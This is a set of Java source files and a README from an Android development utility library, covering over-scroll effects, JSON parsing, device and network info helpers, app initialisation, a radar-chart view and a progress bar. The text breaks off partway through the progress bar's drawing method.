import com.icenler.lib.view.damp_spring.adapters.RecyclerViewOverScrollDecorAdapter;
import com.icenler.lib.view.damp_spring.adapters.ScrollViewOverScrollDecorAdapter;
import com.icenler.lib.view.damp_spring.adapters.StaticOverScrollDecorAdapter;
import com.icenler.lib.view.damp_spring.adapters.ViewPagerOverScrollDecorAdapter;
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
/**
* Created by iCenler - 2016/7/5.
* Description:阻尼弹簧动效
*/
public class OverScrollDecoratorHelper {
public static final int ORIENTATION_VERTICAL = 0;
public static final int ORIENTATION_HORIZONTAL = 1;
@IntDef({ORIENTATION_VERTICAL, ORIENTATION_HORIZONTAL})
@Target(ElementType.PARAMETER)
@Retention(RetentionPolicy.SOURCE)
public @interface ORIENTATION {
}
/**
* Set up the over-scroll effect over a specified {@link RecyclerView} view.
* <br/>Only recycler-views using <b>native</b> Android layout managers (i.e. {@link LinearLayoutManager},
* {@link GridLayoutManager} and {@link StaggeredGridLayoutManager}) are currently supported
* by this convenience method.
*
* @param recyclerView The view.
* @param orientation Either {@link #ORIENTATION_HORIZONTAL} or {@link #ORIENTATION_VERTICAL}.
* @return The over-scroll effect 'decorator', enabling further effect configuration.
*/
public static IOverScrollDecor setUpOverScroll(RecyclerView recyclerView, @ORIENTATION int orientation) {
switch (orientation) {
case ORIENTATION_HORIZONTAL:
return new HorizontalOverScrollBounceEffectDecorator(new RecyclerViewOverScrollDecorAdapter(recyclerView));
case ORIENTATION_VERTICAL:
return new VerticalOverScrollBounceEffectDecorator(new RecyclerViewOverScrollDecorAdapter(recyclerView));
default:
throw new IllegalArgumentException("orientation");
}
}
public static IOverScrollDecor setUpOverScroll(ListView listView) {
return new VerticalOverScrollBounceEffectDecorator(new AbsListViewOverScrollDecorAdapter(listView));
}
public static IOverScrollDecor setUpOverScroll(GridView gridView) {
return new VerticalOverScrollBounceEffectDecorator(new AbsListViewOverScrollDecorAdapter(gridView));
}
public static IOverScrollDecor setUpOverScroll(ViewPager viewPager) {
return new HorizontalOverScrollBounceEffectDecorator(new ViewPagerOverScrollDecorAdapter(viewPager));
}
public static IOverScrollDecor setUpOverScroll(ScrollView scrollView) {
return new VerticalOverScrollBounceEffectDecorator(new ScrollViewOverScrollDecorAdapter(scrollView));
}
public static IOverScrollDecor setUpOverScroll(HorizontalScrollView scrollView) {
return new HorizontalOverScrollBounceEffectDecorator(new HorizontalScrollViewOverScrollDecorAdapter(scrollView));
}
/**
* Set up the over-scroll over a generic view, assumed to always be over-scroll ready (e.g.
* a plain text field, image view).
*
* @param view The view.
* @param orientation One of {@link #ORIENTATION_HORIZONTAL} or {@link #ORIENTATION_VERTICAL}.
* @return The over-scroll effect 'decorator', enabling further effect configuration.
*/
public static IOverScrollDecor setUpStaticOverScroll(View view, @ORIENTATION int orientation) {
switch (orientation) {
case ORIENTATION_HORIZONTAL:
return new HorizontalOverScrollBounceEffectDecorator(new StaticOverScrollDecorAdapter(view));
case ORIENTATION_VERTICAL:
return new VerticalOverScrollBounceEffectDecorator(new StaticOverScrollDecorAdapter(view));
default:
throw new IllegalArgumentException("orientation");
}
}
}
<file_sep># AppDevLib
Android 开发常用工具库<file_sep>>>> 说明:
此包下的布局为Google官方百分比布局类型的扩展,可指定相对宽高百分比设置布局大小,从根本上解决了屏幕适配问题
>>> 使用:(具体参考:https://github.com/hongyangAndroid/android-percent-support-extend)
- 支持属性:
app:layout_widthPercent
app:layout_heightPercent
app:layout_marginPercent
app:layout_marginLeftPercent
app:layout_marginTopPercent
app:layout_marginRightPercent
app:layout_marginBottomPercent
app:layout_marginStartPercent
app:layout_marginEndPercent
app:layout_maxWidthPercent
app:layout_maxHeightPercent
app:layout_minWidthPercent
app:layout_minWidthPercent
app:layout_paddingPercent
app:layout_paddingBottomPercent="8%w"
app:layout_paddingLeftPercent="2%w"
app:layout_paddingRightPercent="4%w"
app:layout_paddingTopPercent="6%w"
app:layout_textSizePercent
- sample:
<TextView
android:layout_width="0dp"
android:layout_height="0dp"
android:layout_gravity="left|top"
android:background="#44ff0000"
android:text="width:30%,height:20%"
app:layout_heightPercent="20%"
android:gravity="center"
app:layout_widthPercent="30%"/>
app:layout_heightPercent="50%w"
app:layout_marginPercent="15%w"
app:layout_marginBottomPercent="20%h"<file_sep>package com.icenler.lib.utils;
import android.support.annotation.NonNull;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import java.util.List;
/**
* Created by iCenler - 2015/9/9.
* Description:JsonUtils工具类
*/
public class JsonUtil {
private JsonUtil() {
throw new UnsupportedOperationException("cannot be instantiated");
}
/**
* @param json
* @param clazz
* @return 解析 Json 中的数据封装到指定对象
*/
public static <T> T parseJson2Obj(String json, @NonNull Class<T> clazz) {
return JSON.parseObject(json, clazz);
}
/**
* @param obj
* @return 解析指定对象为 json 格式
*/
public static String parseObj2Json(Object obj) {
return JSON.toJSONString(obj);
}
/**
* @param json
* @param clazz
* @return 解析 Json 中的数据封装到集合中
*/
public static <T> List<T> parseJson2List(String json, @NonNull Class<T> clazz) {
return JSON.parseArray(json, clazz);
}
/**
* @param json
* @param key
* @return 获取 Json 中指定 key 值对应的 json 数据
*/
public static String getJson2String(String json, String key) {
JSONObject jsonObject = JSON.parseObject(json);
return jsonObject == null ? null : jsonObject.getString(key);
}
}
<file_sep>package com.icenler.lib.feature;
import android.graphics.Typeface;
import com.icenler.lib.BuildConfig;
import com.icenler.lib.utils.AppUtil;
/**
* Created by iCenler - 2015/7/17.
* Description:App 全局配置
*/
public class Constants {
public static boolean DEBUG = BuildConfig.DEBUG;
/* SharedPrefrens */
public static String PREFS_DEVICE_ID = "device_id";
public static String PREFS_UUID = "device_uuid";
public static String PREFS_MAC_ADDRESS = "mac_address";
/* Config Params */
public static String APP_NAME = AppUtil.getAppVersionName(App.getInstance());
/* Font Typeface */
public static Typeface FZHHJT;// 方正行黑简体
public static Typeface MIUI_EN;// MIUI 英文
public static Typeface MIUI_CN;// MIUI 中文
public static Typeface FA_ICON;// Font-Awesome 图形字体
public static Typeface AGENCY;// 小清新
static {
// 字体库初始化加载
// AssetManager assets = BaseApplication.getInstance().getAssets();
// FZHHJT = Typeface.createFromAsset(assets, "fonts/fangzhengjianti.ttf");
// MIUI_EN = Typeface.createFromAsset(assets, "fonts/Roboto-Regular.ttf");
// MIUI_CN = Typeface.createFromAsset(assets, "fonts/DroidSansFallback.ttf");
// FA_ICON = Typeface.createFromAsset(assets, "fonts/fontawesome-webfont.ttf");
}
}
<file_sep>package com.icenler.lib.view.dialog;
import android.app.DialogFragment;
import android.app.FragmentManager;
/**
* Created by iCenler - 2015/4/14.
* Description:温馨提示窗口
*/
public class PromptDialog {
private static DialogFragment mPromptDialog;
public static DialogFragment getDialog() {
return mPromptDialog;
}
/**
* 显示加载框
*/
public static void show(FragmentManager fm) {
try {
if (mPromptDialog == null || !mPromptDialog.isVisible()) {
mPromptDialog = CustonPromptView.createDialog();
mPromptDialog.show(fm, "Prompt_Dialog");
}
} catch (Exception e) {
e.printStackTrace();
mPromptDialog = null;
}
}
/**
* 取消显示
*/
public static void dismiss() {
try {
if (mPromptDialog != null) {
mPromptDialog.dismiss();
}
mPromptDialog = null;
} catch (Exception e) {
e.printStackTrace();
mPromptDialog = null;
}
}
}
<file_sep>package com.icenler.lib.utils;
import android.app.ActivityManager;
import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.net.wifi.WifiInfo;
import android.net.wifi.WifiManager;
import android.os.Environment;
import android.os.StatFs;
import android.provider.Settings;
import android.telephony.TelephonyManager;
import android.text.TextUtils;
import android.text.format.Formatter;
import com.icenler.lib.feature.Constants;
import com.icenler.lib.utils.helper.SharedPrefsHelper;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.NetworkInterface;
import java.net.SocketException;
import java.net.URL;
import java.util.Enumeration;
import java.util.List;
import java.util.UUID;
/**
* Created by iCenler - 2015/7/14.
* Description:Android 开发常用操作工具类
*/
public class AppUtil {
private AppUtil() {
throw new UnsupportedOperationException("cannot be instantiated");
}
/**
* @return 版本号
*/
public static int getAppVersionCode(Context context) {
PackageInfo info;
int versionCode = -1;
try {
info = context.getPackageManager().getPackageInfo(context.getPackageName(), 0);
versionCode = info.versionCode;
} catch (PackageManager.NameNotFoundException e) {
}
return versionCode;
}
/**
* @return 版本名称
*/
public static String getAppVersionName(Context context) {
PackageInfo info;
String versionName = "";
try {
info = context.getPackageManager().getPackageInfo(context.getPackageName(), 0);
versionName = info.versionName;
} catch (PackageManager.NameNotFoundException e) {
}
return versionName;
}
/**
* @return 应用名称
*/
public String getAppName(Context context) {
String applicationName = "";
PackageManager packageManager;
ApplicationInfo applicationInfo;
try {
packageManager = context.getPackageManager();
applicationInfo = packageManager.getApplicationInfo(context.getPackageName(), 0);
applicationName = (String) packageManager.getApplicationLabel(applicationInfo);
} catch (Exception e) {
}
return applicationName;
}
/**
* 检测服务是否运行
*/
public static boolean isServiceRunning(Context context, String className) {
ActivityManager activityManager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);
List<ActivityManager.RunningServiceInfo> servicesList = activityManager.getRunningServices(Integer.MAX_VALUE);
for (ActivityManager.RunningServiceInfo si : servicesList) {
if (className.equals(si.service.getClassName())) {
return true;
}
}
return false;
}
/**
* 非通话设备无法获取 (权限:READ_PHONE_STATE)
*
* @param context
* @return DeviceID TODO 待验证:Build.SERIAL
*/
public static String getDeviceID(Context context) {
TelephonyManager telMgr = (TelephonyManager) context.getSystemService(Context.TELEPHONY_SERVICE);
return telMgr != null ? telMgr.getDeviceId() : null;
}
/**
* @param context
* @return Sim 卡序列号
*/
public static String getSimSerialNumber(Context context) {
TelephonyManager telMgr = (TelephonyManager) context.getSystemService(Context.TELEPHONY_SERVICE);
return telMgr != null ? telMgr.getSimSerialNumber() : null;
}
/**
* 当设备刷机或恢复出厂设置后该值会被重置
*
* @param context
* @return AndroidID
*/
public static String getAndroidID(Context context) {
return Settings.Secure.getString(context.getContentResolver(), Settings.Secure.ANDROID_ID);
}
/**
* 没有 Wifi 和蓝牙硬件设备无法获取
*
* @param context
* @return MacAddress
*/
public static String getMacAddress(Context context) {
String macAddress = SharedPrefsHelper.get(Constants.PREFS_MAC_ADDRESS, "");
if (TextUtils.isEmpty(macAddress)) {
WifiManager wifiMgr = (WifiManager) context.getSystemService(Context.WIFI_SERVICE);
if (null != wifiMgr) {
WifiInfo info = wifiMgr.getConnectionInfo();
if (null != info) {
macAddress = info.getMacAddress();
SharedPrefsHelper.put(Constants.PREFS_MAC_ADDRESS, macAddress);
}
}
}
return macAddress;
}
/**
* @param context
* @param appName
* @return 通用唯一标识
*/
public static String getUniversalID(Context context) {
String uuid = SharedPrefsHelper.get(Constants.PREFS_UUID, "");
if (uuid == null) {
final String androidId = Settings.Secure.getString(
context.getContentResolver(),
Settings.Secure.ANDROID_ID);
try {
if (!"9774d56d682e549c".equals(androidId)) {
uuid = UUID.nameUUIDFromBytes((androidId).getBytes("utf8")).toString();
} else {
uuid = UUID.randomUUID().toString();
}
} catch (Exception e) {
uuid = UUID.randomUUID().toString();
}
SharedPrefsHelper.put(Constants.PREFS_UUID, uuid);
}
return uuid;
}
/**
* @return IPv6 地址形式
*/
public static String getLocalIpv6Address() {
try {
for (Enumeration<NetworkInterface> en = NetworkInterface.getNetworkInterfaces(); en.hasMoreElements(); ) {
NetworkInterface intf = en.nextElement();
for (Enumeration<InetAddress> enumIpAddr = intf.getInetAddresses(); enumIpAddr.hasMoreElements(); ) {
InetAddress inetAddress = enumIpAddr.nextElement();
if (!inetAddress.isLoopbackAddress()) {
return inetAddress.getHostAddress().toString();
}
}
}
} catch (SocketException ex) {
LogUtil.e("WifiPreference IpAddress" + ex.toString());
}
return null;
}
/**
* @return IPv4 地址形式
*/
public static String getLocalIpAddress() {
try {
for (Enumeration<NetworkInterface> en = NetworkInterface
.getNetworkInterfaces(); en.hasMoreElements(); ) {
NetworkInterface intf = en.nextElement();
for (Enumeration<InetAddress> enumIpAddr = intf.getInetAddresses(); enumIpAddr.hasMoreElements(); ) {
InetAddress inetAddress = enumIpAddr.nextElement();
if (!inetAddress.isLoopbackAddress() && !inetAddress.isLinkLocalAddress()) {
return inetAddress.getHostAddress().toString();
}
}
}
} catch (SocketException ex) {
LogUtil.e("WifiPreference IpAddress" + ex.toString());
}
return null;
}
public static String getInternetIP() {
String ip = null;
try {
String address = "http://ip.taobao.com/service/getIpInfo2.php?ip=myip";
URL url = new URL(address);
HttpURLConnection connection = (HttpURLConnection) url.openConnection();
connection.setUseCaches(false);
if (connection.getResponseCode() == HttpURLConnection.HTTP_OK) {
InputStream in = connection.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(in));
String tmpString = "";
StringBuilder retJSON = new StringBuilder();
while ((tmpString = reader.readLine()) != null) {
retJSON.append(tmpString + "\n");
}
JSONObject jsonObject = new JSONObject(retJSON.toString());
String code = jsonObject.getString("code");
if (code.equals("0")) {
JSONObject data = jsonObject.getJSONObject("data");
ip = data.getString("ip");
} else {
ip = "";
LogUtil.e("IP接口异常,无法获取IP地址!");
}
} else {
ip = "";
LogUtil.e("网络连接异常,无法获取IP地址!");
}
} catch (Exception exception) {
LogUtil.e("GetNetIp() : exception = " + exception.toString());
}
return ip;
}
/**
* @return 判断SDCard是否可用
*/
public static boolean isSdcardAvailable() {
return Environment.getExternalStorageState()
.equals(Environment.MEDIA_MOUNTED);
}
/**
* @param path
* @return 获取指定路径空间大小
*/
public static long getAvailableBytesForDirectory(String path) {
return new StatFs(path).getAvailableBytes();
}
/**
* @param number
* @return 自动格式化空间大小单位
*/
public static String formatSpaceSize(Context context, long number) {
return Formatter.formatFileSize(context, number);
}
}
<file_sep>package com.icenler.lib.feature;
import android.app.ActivityManager;
import android.app.Application;
import android.content.Context;
import android.os.StrictMode;
import com.android.volley.RequestQueue;
import com.android.volley.toolbox.Volley;
import com.icenler.lib.receiver.lifecycle.ApplicationLifecycleListener;
import com.icenler.lib.receiver.lifecycle.ExitAppReceiver;
import com.icenler.lib.utils.LogUtil;
import com.nostra13.universalimageloader.cache.disc.naming.Md5FileNameGenerator;
import com.nostra13.universalimageloader.core.ImageLoader;
import com.nostra13.universalimageloader.core.ImageLoaderConfiguration;
import com.nostra13.universalimageloader.core.assist.QueueProcessingType;
import com.nostra13.universalimageloader.core.download.BaseImageDownloader;
import com.squareup.leakcanary.LeakCanary;
import com.squareup.leakcanary.RefWatcher;
import java.util.List;
/**
* Created by iCenler - 2015/7/13:
* Description:应用启动初始化
*/
public class App extends Application {
private static App mInstance;
private static RefWatcher mRefWatcher;
private static RequestQueue mHttpQueues;
private ApplicationLifecycleListener mLiftListener;
/**
* @return App 全局上下文
*/
public static App getInstance() {
return mInstance;
}
/**
* @return 内存泄露检测工具
*/
public static RefWatcher getRefWatcher() {
return mRefWatcher;
}
/**
* @return Volley 全局请求队列
*/
public static RequestQueue getHttpQueues() {
return mHttpQueues;
}
/**
* @return 前后台切换状态
*/
public boolean isBackground() {
return mLiftListener.isBackground();
}
/**
* 退出应用
*/
public void exitApp() {
ExitAppReceiver.exitApp(this);
Runtime.getRuntime().exit(0);
android.os.Process.killProcess(android.os.Process.myPid());
}
@Override
public void onCreate() {
super.onCreate();
// 独立进程导致重复初始化问题处理
ActivityManager am = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
List<ActivityManager.RunningAppProcessInfo> runningApps = am.getRunningAppProcesses();
if (runningApps != null) {
for (ActivityManager.RunningAppProcessInfo processInfo : runningApps) {
if (processInfo.pid == android.os.Process.myPid()) {
if (!getPackageName().equals(processInfo.processName)) {
LogUtil.i(processInfo.processName);
return;
}
}
}
}
mInstance = App.this;
mInstance.registerActivityLifecycleCallbacks(mLiftListener = new ApplicationLifecycleListener());
initAllSdk();
}
private void initAllSdk() {
initStrictMode();
installLeakCanary(this);
initRequestQueues(getApplicationContext());
initImageLoaderConfig(getApplicationContext());
}
private void initStrictMode() {
if (Constants.DEBUG) {
StrictMode.setThreadPolicy(new StrictMode.ThreadPolicy
.Builder()
.detectAll()
.penaltyLog()
.build());// 磁盘读写及网络
StrictMode.setVmPolicy(new StrictMode.VmPolicy
.Builder()
.detectAll()
.penaltyLog()
.build());// 内存相关检测
}
}
private void initRequestQueues(Context context) {
mHttpQueues = Volley.newRequestQueue(context);
}
/**
* ImageLoader 异步网络图片加载框架初始化
*/
private void initImageLoaderConfig(Context context) {
ImageLoaderConfiguration.Builder config = new ImageLoaderConfiguration.Builder(context);
config.threadPoolSize(3);//线程池内加载的数量
config.threadPriority(Thread.NORM_PRIORITY - 2);
config.denyCacheImageMultipleSizesInMemory();// 禁止缓存多张图片
config.memoryCacheSize(20 * 1024 * 1024);// 内存缓存 20 MiB
config.diskCacheSize(50 * 1024 * 1024); // 固化缓存 50 MiB
config.diskCacheFileCount(100);
config.imageDownloader(new BaseImageDownloader(context, 5 * 1000, 30 * 1000)); // connectTimeout (5 s), readTimeout (30 s)超时时间
config.diskCacheFileNameGenerator(new Md5FileNameGenerator());// 缓存文件名称 key 转换方式
config.tasksProcessingOrder(QueueProcessingType.LIFO);//设置加载显示图片队列进程
config.writeDebugLogs(); // 日志记录
// Initialize ImageLoader with onfiguration.
ImageLoader.getInstance().init(config.build());
// 以下配置用于 displayImage(String uri, ImageView imageView, DisplayImageOptions options) 调用配置
// DisplayImageOptions.Builder options = new DisplayImageOptions.Builder();
// options.showImageOnLoading(R.mipmap.ic_launcher); //设置图片在下载期间显示的图片
// options.showImageForEmptyUri(R.mipmap.ic_launcher); //设置图片Uri为空或是错误的时候显示的图片
// options.showImageOnFail(R.mipmap.ic_launcher); //设置图片加载/解码过程中错误时候显示的图片
// options.cacheInMemory(true); //设置下载的图片是否缓存在内存中
// options.cacheOnDisk(true); //设置下载的图片是否缓存在SD卡中
// options.imageScaleType(ImageScaleType.EXACTLY_STRETCHED); //设置图片以如何的编码方式显示
// options.considerExifParams(true); //是否考虑JPEG图像EXIF参数(旋转,翻转)
// options.bitmapConfig(Bitmap.Config.RGB_565); //设置图片的解码类型
// options.decodingOptions(android.graphics.BitmapFactory.Options decodingOptions);//设置图片的解码配置
// options.delayBeforeLoading(int delayInMillis); //int delayInMillis为你设置的下载前的延迟时间
// options.preProcessor(BitmapProcessor preProcessor); //设置图片加入缓存前,对bitmap进行设置
// options.resetViewBeforeLoading(true); //设置图片在下载前是否重置,复位
// options.displayer(new RoundedBitmapDisplayer(20)); //是否设置为圆角,弧度为多少
// options.displayer(new FadeInBitmapDisplayer(100)); //是否图片加载好后渐入的动画时间
// options.build();
}
/**
* 内存泄露检测工具:release 版本下使用 RefWatcher.DISABLED
*/
private void installLeakCanary(Application app) {
if (!Constants.DEBUG) {
mRefWatcher = RefWatcher.DISABLED;
} else {
mRefWatcher = LeakCanary.install(app);
}
}
}
<file_sep>package com.icenler.lib.view.demo;
import android.content.Context;
import android.graphics.Canvas;
import android.graphics.Paint;
import android.graphics.Path;
import android.util.AttributeSet;
import android.view.View;
import com.icenler.lib.R;
import com.icenler.lib.utils.LogUtil;
import com.icenler.lib.utils.ScreenUtil;
/**
* Created by Fangde on 2016/1/22.
* Description: 蜘蛛网分布图 示例——待完善扩充
* https://github.com/jiangzehui/polygonsview
*/
public class RadarView extends View {
private float mRaduis;
private float mAngle; // 弧度数据
private int centerX, centerY;
private int shapeCnt = 6;
private int textSize = ScreenUtil.sp2px(12);
private String[] titles = {"A", "B", "C", "D", "E", "F"};
private int[] percentFactor = {95, 80, 92, 88, 90, 85};
private Paint mShapePaint;
private Paint mTextPaint;
private Paint mRegionPaint;
private Path mShapePath;
public RadarView(Context context) {
this(context, null);
}
public RadarView(Context context, AttributeSet attrs) {
this(context, attrs, 0);
}
public RadarView(Context context, AttributeSet attrs, int defStyleAttr) {
super(context, attrs, defStyleAttr);
init();
}
/**
* 初始化相关参数
*/
private void init() {
mShapePaint = new Paint(Paint.ANTI_ALIAS_FLAG);
mShapePaint.setStrokeWidth(1);
mShapePaint.setColor(getResources().getColor(R.color.color_grey_assist));
mShapePaint.setStyle(Paint.Style.STROKE);
mTextPaint = new Paint(Paint.ANTI_ALIAS_FLAG);
mTextPaint.setTextSize(textSize);
mTextPaint.setColor(getResources().getColor(R.color.color_ink));
mRegionPaint = new Paint(Paint.ANTI_ALIAS_FLAG);
mRegionPaint.setColor(getResources().getColor(R.color.color_blue_assist));
mRegionPaint.setStyle(Paint.Style.FILL_AND_STROKE);
mRegionPaint.setAlpha(180);
mShapePath = new Path();
mAngle = (float) (Math.PI * 2 / shapeCnt);
}
@Override
protected void onSizeChanged(int w, int h, int oldw, int oldh) {
mRaduis = (Math.min(w, h) >> 1) * 0.9f;
centerX = w >> 1;
centerY = h >> 1;
LogUtil.d("Raduis: " + mRaduis + ", CenterX: " + centerX + ", CenterY: " + centerY);
super.onSizeChanged(w, h, oldw, oldh);
}
@Override
protected void onDraw(Canvas canvas) {
drawPolygon(canvas);
drawLine(canvas);
drawText(canvas);
drawRegion(canvas);
}
/**
* 绘制正多边形
*
* @param canvas
*/
private void drawPolygon(Canvas canvas) {
float dis = mRaduis / (shapeCnt - 1);
for (int i = 1; i < shapeCnt; i++) {
float r = dis * i;// 半径
LogUtil.i("Current Radius: " + r);
mShapePath.reset();
for (int j = 0; j < shapeCnt; j++) {
float x, y;
if (j == 0) {
// 起始坐标
x = centerX + r;
y = centerY;
mShapePath.moveTo(x, y);
} else {
// 三角函数计算坐标
x = (float) (centerX + Math.cos(mAngle * j) * r);
y = (float) (centerY + Math.sin(mAngle * j) * r);
mShapePath.lineTo(x, y);
}
LogUtil.d("Point - " + j + " (" + x + ", " + y + ")");
}
mShapePath.close();
canvas.drawPath(mShapePath, mShapePaint);
}
}
/**
* 绘制等分线
*
* @param canvas
*/
private void drawLine(Canvas canvas) {
for (int i = 0; i < shapeCnt; i++) {
mShapePath.reset();
mShapePath.moveTo(centerX, centerY);
float x = (float) (centerX + Math.cos(mAngle * i) * mRaduis);
float y = (float) (centerY + Math.sin(mAngle * i) * mRaduis);
mShapePath.lineTo(x, y);
LogUtil.d("Point - " + i + " (" + x + ", " + y + ")");
canvas.drawPath(mShapePath, mShapePaint);
}
}
/**
* 绘制区域文本
*
* @param canvas
*/
private void drawText(Canvas canvas) {
Paint.FontMetrics fontMetrics = mTextPaint.getFontMetrics();
float textHeight = fontMetrics.descent - fontMetrics.ascent;
for (int i = 0; i < shapeCnt; i++) {
float radian = mAngle * i;
float baseX = (float) (centerX + Math.cos(radian) * (mRaduis + 24));
float baseY = (float) (centerY + Math.sin(radian) * (mRaduis + 24));
// 绘制基线坐标偏移量
float offsetY = (Math.abs(fontMetrics.ascent + fontMetrics.descent)) / 2;
// 根据弧度数判断所在象限
if (radian >= 0 && radian <= Math.PI) {
canvas.drawText(titles[i], baseX, baseY + offsetY, mTextPaint);
} else {
canvas.drawText(titles[i], baseX, baseY, mTextPaint);
}
}
}
/**
* 分布区域图
*
* @param canvas
*/
private void drawRegion(Canvas canvas) {
mShapePath.reset();
for (int i = 0; i < shapeCnt; i++) {
float p = percentFactor[i] * 1.0f / 100;// 百分比系数
float x = (float) (centerX + Math.cos(mAngle * i) * (mRaduis * p));
float y = (float) (centerY + Math.sin(mAngle * i) * (mRaduis * p));
if (i == 0) {
mShapePath.moveTo(x, centerY);
} else {
mShapePath.lineTo(x, y);
}
LogUtil.d("(" + x + ", " + y + ")");
}
mShapePath.close();
canvas.drawPath(mShapePath, mRegionPaint);
}
}
<file_sep>package com.multichannel;
/**
* Created by Fangde on 2016/2/22.
* Description:
*/
public class MultiChannelBuildTool {
public static String[] channels = new String[]{
"Qihoo_360",
"Tencent_qq",
"Baiudu",
"Wandoujia",
"Xiaomi"
};
public static void main(String[] args) {
long startTime = System.currentTimeMillis();
System.out.println((System.currentTimeMillis() - startTime) + " MS");
}
}
<file_sep>package com.icenler.lib.view;
import android.content.Context;
import android.content.res.TypedArray;
import android.graphics.Canvas;
import android.graphics.Paint;
import android.util.AttributeSet;
import android.widget.ProgressBar;
import com.icenler.lib.R;
import com.icenler.lib.utils.ScreenUtil;
/**
* 自定义横向百分比进度条:基于ProgressBar
* 1、 该控件包含基本的 ProgressBar 属性,同时也设置如下属性
* - 百分比文本大小、颜色、是否显示以及文本左右偏移空白区
* - 已完成进度条颜色及高度
* - 未完成进度条颜色及高度
* 2、 属性详情参考:res/values/attr_progress_bar.xml - HorizontalProgressBarWithNumber
*/
public class HorizontalProgressBarWithNumber extends ProgressBar {
private static final int DEFAULT_TEXT_SIZE = 10;
private static final int DEFAULT_TEXT_COLOR = 0xFFFC00D1;
private static final int DEFAULT_REACHED_COLOR = 0xFFFC00D1;
private static final int DEFAULT_UNREACHED_COLOR = 0xFFD3D6DA;
private static final int DEFAULT_REACHED_PROGRESS_BAR_HEIGHT = 2;
private static final int DEFAULT_UNREACHED_PROGRESS_BAR_HEIGHT = 2;
private static final int DEFAULT_TEXT_OFFSET = 3;
/**
* 全局绘图画笔
*/
protected Paint mPaint = new Paint();
/**
* 百分比进度颜色
*/
protected int mTextColor = DEFAULT_TEXT_COLOR;
/**
* 百分比进度字体大小:单位(sp)
*/
protected int mTextSize = ScreenUtil.sp2px(DEFAULT_TEXT_SIZE);
/**
* 百分比数值偏移系数:单位(dp)
*/
protected int mTextOffset = ScreenUtil.dp2px(DEFAULT_TEXT_OFFSET);
/**
* 已完成进度条颜色
*/
protected int mReachedBarColor = DEFAULT_REACHED_COLOR;
/**
* 未完成进度条颜色
*/
protected int mUnReachedBarColor = DEFAULT_UNREACHED_COLOR;
/**
* 已完成进度条高度:单位(dp)
*/
protected int mReachedProgressBarHeight = ScreenUtil.dp2px(DEFAULT_REACHED_PROGRESS_BAR_HEIGHT);
/**
* 未完成进度条高度:单位(dp)
*/
protected int mUnReachedProgressBarHeight = ScreenUtil.dp2px(DEFAULT_UNREACHED_PROGRESS_BAR_HEIGHT);
/**
* 进度条实际宽度
*/
protected int mRealWidth;
/**
* 进度百分比控制显示标志
*/
protected boolean mIfDrawText = true;
protected static final int VISIBLE = 0;
public HorizontalProgressBarWithNumber(Context context) {
super(context);
}
public HorizontalProgressBarWithNumber(Context context, AttributeSet attrs) {
this(context, attrs, 0);
}
public HorizontalProgressBarWithNumber(Context context, AttributeSet attrs, int defStyle) {
super(context, attrs, defStyle);
this.setHorizontalScrollBarEnabled(true);
getObtainStyleAttributes(attrs);
mPaint.setTextSize(mTextSize);
}
/**
* 获取设置的属性值
*
* @param attrs
*/
private void getObtainStyleAttributes(AttributeSet attrs) {
TypedArray attributes = getContext().obtainStyledAttributes(attrs, R.styleable.HorizontalProgressBarWithNumber);
mTextColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_text_color, mTextColor);
mTextSize = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_text_size, mTextSize);
mTextOffset = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_text_offset, mTextOffset);
mReachedBarColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_reached_color, mReachedBarColor);
mUnReachedBarColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_unreached_color, mUnReachedBarColor);
mReachedProgressBarHeight = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_reached_bar_height, mReachedProgressBarHeight);
mUnReachedProgressBarHeight = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_unreached_bar_height, mUnReachedProgressBarHeight);
int textVisible = attributes.getInt(R.styleable.HorizontalProgressBarWithNumber_progress_text_visibility, VISIBLE);
if (textVisible != VISIBLE) {
mIfDrawText = false;
}
/* Give back a previously retrieved StyledAttributes, for later re-use. */
attributes.recycle();
}
@Override
protected synchronized void onMeasure(int widthMeasureSpec, int heightMeasureSpec) {
/* specMode 对应类型 specSize = MeasureSpec.getSize(heightMeasureSpec) */
/* AT_MOST -- specSize 代表的是最大可获得的空间 -- wrap_content */
/* EXACTLY -- specSize 代表的是精确的尺寸 -- 明确值(or match_parent) */
/* UNSPECIFIED -- 0 */
int heightMode = MeasureSpec.getMode(heightMeasureSpec);
if (heightMode != MeasureSpec.EXACTLY) {
float textHeight = (mPaint.getFontMetrics().descent - mPaint.getFontMetrics().ascent);
int exceptHeight = (int) (this.getPaddingTop() + this.getPaddingBottom() +
Math.max(Math.max(mReachedProgressBarHeight, mUnReachedProgressBarHeight), textHeight));
heightMeasureSpec = MeasureSpec.makeMeasureSpec(exceptHeight, MeasureSpec.EXACTLY);
}
/*
* 基线(baeseline),坡顶(ascenter or top),坡底(descenter or bottom)
* 上坡度(ascent),下坡度(descent)
* 行间距(leading):坡底到下一行坡顶的距离
* 字体的高度=上坡度+下坡度
* Ps:top and bottom 即为 ascent and descent 的最大值,且 ascent 和 top 都是负数
* */
// example:ÀÁÂABCfghijpqy
/*
Paint.ascent() = -66.83203
Paint.descent() = 16.980469
paint.getFontSpacing() = 83.8125
Paint.getFontMetrics().ascent = -66.83203
Paint.getFontMetrics().descent = 16.980469
Paint.getFontMetrics().leading = 0.0
Paint.getFontMetrics().top = -75.44531
Paint.getFontMetrics().bottom = 19.511719
*/
super.onMeasure(widthMeasureSpec, heightMeasureSpec);
}
@Override
protected void onSizeChanged(int w, int h, int oldw, int oldh) {
super.onSizeChanged(w, h, oldw, oldh);
// 获取控件真实宽度
mRealWidth = w - this.getPaddingRight() - this.getPaddingLeft();
}
@Override
protected synchronized void onDraw(Canvas canvas) {
boolean noNeedBg = false;
